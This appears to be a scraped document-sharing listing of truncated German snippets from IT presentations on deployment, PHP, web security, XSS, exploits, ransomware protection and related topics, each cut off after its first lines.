IML Deployment Axel Hahn 31.10.2013 zuletzt geändert: 04.04.2014 IML Deployment Axel Hahn 31.10.2013 zuletzt geändert: 04.04.2014 Agenda Einleitung, Ausgangslage Build- Prozess, Hooks Phasen + Workflow Handling der KonfiguraHonsdateien InstallaHon mit Puppet Ablage

Mehr

Grundlagen der Web-Sicherheit

Grundlagen der Web-Sicherheit Grundlagen der Web-Sicherheit Das Labor e.v. 29.05.2008 Johannes Dahse, Felix Gröbert johannesdahse@gmx.de, felix@groebert.org creativecommons.org/licenses/by-nc-nd/2.0/de pwn pwn pwn...!"#$%&'($)*+,-&../%

Mehr

Multimedia im Netz. Wintersemester 2011/12. Übung 10. Betreuer: Verantwortlicher Professor: Sebastian Löhmann. Prof. Dr.

Multimedia im Netz. Wintersemester 2011/12. Übung 10. Betreuer: Verantwortlicher Professor: Sebastian Löhmann. Prof. Dr. Multimedia im Netz Wintersemester 2011/12 Übung 10 Betreuer: Verantwortlicher Professor: Sebastian Löhmann Prof. Dr. Heinrich Hussmann Organisatorisches 2 Gesundes neues Jahr 3 Blatt 08 Videoformate im

Mehr

MEHR KONTROLLE, MEHR SICHERHEIT. Business Suite

MEHR KONTROLLE, MEHR SICHERHEIT. Business Suite MEHR KONTROLLE, MEHR SICHERHEIT Business Suite 2 ENDGERÄTESCHUTZ - DAS HERZSTÜCK DER CYBER SECURITY Cyber-Angriffe treten immer häufiger auf und werden dabei stets ausgefeilter. Jedes Unternehmen kann

Mehr

Domino und PHP EC 2013 Track 2 Session 7

Domino und PHP EC 2013 Track 2 Session 7 Domino und PHP EC 2013 Track 2 Session 7 1 Domino und PHP Worum es heute geht Überblick über die verschiedenen Methoden Installation Allerlei Beispiele und Ideen Worum es nicht geht LotusScript, PHP (Sie

Mehr

Sicherheit wird messbar Lösungsansätze und Methoden. Email Case. 15. September 2009, Hotel St. Gotthard, Zürich

Sicherheit wird messbar Lösungsansätze und Methoden. Email Case. 15. September 2009, Hotel St. Gotthard, Zürich Sicherheit wird messbar Lösungsansätze und Methoden Email Case 15. September 2009, Hotel St. Gotthard, Zürich ActiveSync Div. Email Landschaft PeerToPeer -USB -Bluetooth Smart phone Netzwerk - Ethernet

Mehr

Requirements basiertes Testen mit JUnit Architektur für eine Verbindung von Requirements Management und Test Management

Requirements basiertes Testen mit JUnit Architektur für eine Verbindung von Requirements Management und Test Management Requirements basiertes Testen mit JUnit Architektur für eine Verbindung von Requirements Management und Test Management Oliver Böhm MKS GmbH Agenda Architektur und Umsetzung MKS Integrity MKS Requirements

Mehr

Einrichtung der Datenbank und Front-End Software

Einrichtung der Datenbank und Front-End Software Schule als Staat EDV-System Einrichtung der Datenbank und Front-End Software Letzte Änderungen: 26.11.2017 1 Inhalt 1 Einführung... 3 1.1 Systemanforderungen... 3 1.2 Wissensanforderungen... 3 2 Setup...

Mehr

Netzwerksicherheit Übung 9 Websicherheit

Netzwerksicherheit Übung 9 Websicherheit Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany

Mehr

Next Generation Server Protection

Next Generation Server Protection Next Generation Server Protection Ransomware-Schutz, automatisches Whitelisting und Synchronized Security Michael Veit Technology Evangelist Server-Schutz der nächsten Generation Wer ist Sophos? Automatisches

Mehr

Migra?on VMWare basierender Datenbanken auf Knopfdruck

Migra?on VMWare basierender Datenbanken auf Knopfdruck Migra?on VMWare basierender Datenbanken auf Knopfdruck Oracle Ravello Cloud Service Marcus Schröder Master Principal Sales Consultant Business Unit Core & Cloud Technologies Oracle Deutschland Copyright

Mehr

Exploits & Rootkits. Betriebssystemdienste & -administration Seminar. Betriebssysteme und Middleware. Sebastian.Roschke@hpi.uni-potsdam.

Exploits & Rootkits. Betriebssystemdienste & -administration Seminar. Betriebssysteme und Middleware. Sebastian.Roschke@hpi.uni-potsdam. Exploits & Rootkits Betriebssystemdienste & -administration Seminar Betriebssysteme und Middleware Sebastian.Roschke@hpi.uni-potsdam.de Steffen.Ryll@hpi.uni-potsdam.de Steffen Ryll & Sebastian Roschke

Mehr

SECURE BROWSING ELIMINIEREN SIE BEDROHUNG DURCH RANSOMWARE ATTACKEN. Florian Eller CEO Ruf Avatech AG Andreas Tischer CTO Ruf Avatech AG

SECURE BROWSING ELIMINIEREN SIE BEDROHUNG DURCH RANSOMWARE ATTACKEN. Florian Eller CEO Ruf Avatech AG Andreas Tischer CTO Ruf Avatech AG SECURE BROWSING ELIMINIEREN SIE BEDROHUNG DURCH RANSOMWARE ATTACKEN Florian Eller CEO Ruf Avatech AG Andreas Tischer CTO Ruf Avatech AG 3 4 Ein kurzer Rückblick was ist passiert? 5 INFEKTION - Schadcode

Mehr

UCS 2.3 Sicherheits-Update 4

UCS 2.3 Sicherheits-Update 4 UCS 2.3 Sicherheits-Update 4 Thema: Änderungen im Sicherheitsupdate 4 für UCS 2.3 Datum: 1. Juli 2010 Seitenzahl: 11 Versionsnummer: 5768 Autoren: Univention GmbH feedback@univention.de Univention GmbH

Mehr

Play with Ansible - Provisioning von Weblogic mit Ansible

Play with Ansible - Provisioning von Weblogic mit Ansible Play with Ansible - Provisioning von Weblogic mit Ansible Bio Thorsten Wussow 20 Jahre IT davon 16 Jahre mit Oracle thorsten@slix.de Twitter: @thwussi 2 Agenda Einleitung Ansible Allgemein Ansible für

Mehr

Scripting Framework PowerShell Toolkit Quick-Install a Workplace for Packaging and Test

Scripting Framework PowerShell Toolkit Quick-Install a Workplace for Packaging and Test Scripting Framework PowerShell Toolkit Quick-Install a Workplace for Packaging and Test Windows Client Management AG Alte Haslenstrasse 5 CH-9053 Teufen wincm.ch 1 Quick Install - Scripting Framework Workplace...3

Mehr

RIPS. Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse. BSI - 12. Deutscher IT-Sicherheitskongress

RIPS. Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse. BSI - 12. Deutscher IT-Sicherheitskongress BSI - 12. Deutscher IT-Sicherheitskongress 10.-12. Mai.2011, Bonn Automatisierte Schwachstellenerkennung in PHP-Software mittels statischer Quellcode-Analyse, Ruhr-Universität Bochum 1 1.1 Motivation Schwachstellen

Mehr

PCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick:

PCI Security Scan. Beweisen Sie Ihre Sicherheit! Ihre Vorteile auf einen Blick: Beweisen Sie Ihre Sicherheit! Unser Security Scan ist eine Sicherheitsmaßnahme, die sich auszahlt. Systeme ändern sich ständig. Selbst Spezialisten kennen nicht alle Schwachstellen im Detail. Der PCI Scan

Mehr

Web Applications Wie können sie geschützt werden?

Web Applications Wie können sie geschützt werden? Whitepaper // Web Applications Web Applications Wie können sie geschützt werden? Obwohl die Webseite eines Unternehmens ein enorm wichtiger Erfolgsfaktor ist, wird die Bedeutung der Sicherheit von Web-Applikationen

Mehr

Die ideale PHP-Entwicklungsumgebung für IBM i Programmierer

Die ideale PHP-Entwicklungsumgebung für IBM i Programmierer Die ideale PHP-Entwicklungsumgebung für IBM i Programmierer Jan Burkl Solution Consultant jan@zend.com Agenda Zend Server 5.1 Update Technische Übersicht von Zend Studio Remote Server Setup Remote Projects

Mehr

Anleitung: Verbindung mit der Datenbank

Anleitung: Verbindung mit der Datenbank Anleitung: Verbindung mit der Datenbank Der Zugriff auf die MySQL-Datenbank selbst kann mit sämtlichen dafür erhältlichen Tools (Beispielsweise SquirrelSQL, Toad für MySQL, EMS SQL Manager, TOra oder ähnliches)

Mehr

EntwicklerCamp Extending Lotus Notes Widgets, Livetext, Plugins

EntwicklerCamp Extending Lotus Notes Widgets, Livetext, Plugins EntwicklerCamp 2012 Extending Lotus Notes Widgets, Livetext, Plugins Detlev Pö.gen midpoints GmbH www.midpoints.de midpoints GmbH h.p://www.midpoints.de IBM Advanced Business Partner IBM Design Partner

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 7. Intrusion Prevention System 7.1 Einleitung Sie konfigurieren das Intrusion Prevention System um das Netzwerk vor Angriffen zu schützen. Grundsätzlich soll nicht jeder TFTP Datenverkehr blockiert werden,

Mehr

Raffinierte Shell Scripts

Raffinierte Shell Scripts COk - 2008 AGI-Information Management Consultants May be used for personal purporses only or by libraries associated to dandelon.com network. Dave Taylor Raffinierte Shell Scripts Übersetzung aus dem Amerikanischen

Mehr

OwnCloud. Florian Preinstorfer. http://nblock.org VALUG 14.02.2014

OwnCloud. Florian Preinstorfer. http://nblock.org VALUG 14.02.2014 OwnCloud Florian Preinstorfer http://nblock.org VALUG 14.02.2014 This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 Austria license (CC-BY-SA). Inhalt Einleitung OwnCloud Editions

Mehr

Web Exploit Toolkits - Moderne Infektionsroutinen -

Web Exploit Toolkits - Moderne Infektionsroutinen - Web Exploit Toolkits - Moderne Infektionsroutinen - Dominik Birk - Christoph Wegener 16. DFN Workshop Sicherheit in vernetzten Systemen Hannover, 18. März 2009 1 Die Vortragenden Dominik Birk Mitarbeiter

Mehr

Oracle Data Integrator Ein Überblick

Oracle Data Integrator Ein Überblick Oracle Data Integrator Ein Überblick Uwe Barz Christoph Jansen Hamburg, 15.04.2008 Basel Baden Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br. Hamburg München Stuttgart Wien Agenda Überblick

Mehr

DAS EINSTEIGERSEMINAR. Drupal 6. von Thorsten P Luhm. 1. Auflage. Drupal 6 Luhm schnell und portofrei erhältlich bei beck-shop.de DIE FACHBUCHHANDLUNG

DAS EINSTEIGERSEMINAR. Drupal 6. von Thorsten P Luhm. 1. Auflage. Drupal 6 Luhm schnell und portofrei erhältlich bei beck-shop.de DIE FACHBUCHHANDLUNG DAS EINSTEIGERSEMINAR Drupal 6 von Thorsten P Luhm 1. Auflage Drupal 6 Luhm schnell und portofrei erhältlich bei beck-shop.de DIE FACHBUCHHANDLUNG mitp/bhv 2008 Verlag C.H. Beck im Internet: www.beck.de

Mehr

Sind Cloud Apps der nächste Hype?

Sind Cloud Apps der nächste Hype? Java Forum Stuttgart 2012 Sind Cloud Apps der nächste Hype? Tillmann Schall Stuttgart, 5. Juli 2012 : Agenda Was sind Cloud Apps? Einordnung / Vergleich mit bestehenden Cloud Konzepten Live Demo Aufbau

Mehr

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes 1 XSS: Cross-Site Scripting 1.) Es gelangen Daten in den Web-Browser, die Steuerungsinformationen

Mehr